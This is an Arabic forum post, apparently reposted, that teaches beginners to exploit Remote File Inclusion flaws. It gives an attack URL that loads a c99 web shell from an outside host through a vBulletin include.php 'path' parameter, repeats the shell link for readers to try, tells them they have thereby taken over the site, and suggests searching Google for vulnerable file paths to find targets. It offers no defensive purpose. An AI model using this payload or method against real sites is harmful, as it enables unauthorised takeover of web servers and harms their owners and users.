بسم الله الرحمن الرحيم
طريقة البحث واستغلال ثغرات
Remote File Include
الشرح هذا موجه للمبتدئين وهو عن كيفيه استغلال الثغرات مع شرح لثغرة هذا الثغرة يتم تطبيقها عبر الشيل مثال:
كود:
http://xxx.com/vb/includes/include.php?path = http://crashz.by.ru/shell/c99.txt?
لاحظ وجود رابط الشيل
http://crashz.by.ru/shell/c99.txt?
تابع الشرح باالصور :
وبكذا تكون دخلت علي الشيل والف مبروك عليك الموقع
وهذا رابط الشيل اذا كنتم تريدون التطبيق :
كود:
http://crashz.by.ru/shell/c99.txt?
وعند حصولكم على ثغرة في ملف معين وتريدون البحث عن الملف هذا في محرك البحث جوجل ما عليكم سوى وضع هذا الكلمة وتليها المسار التي تريد البحث عنه
تروح تغير المسار
xxx/xxx.php
الى مسار الملف المصابة بثغرة الشيل
المووضوع منقول للفائدة
تحياتي لكم القنبلة المؤقت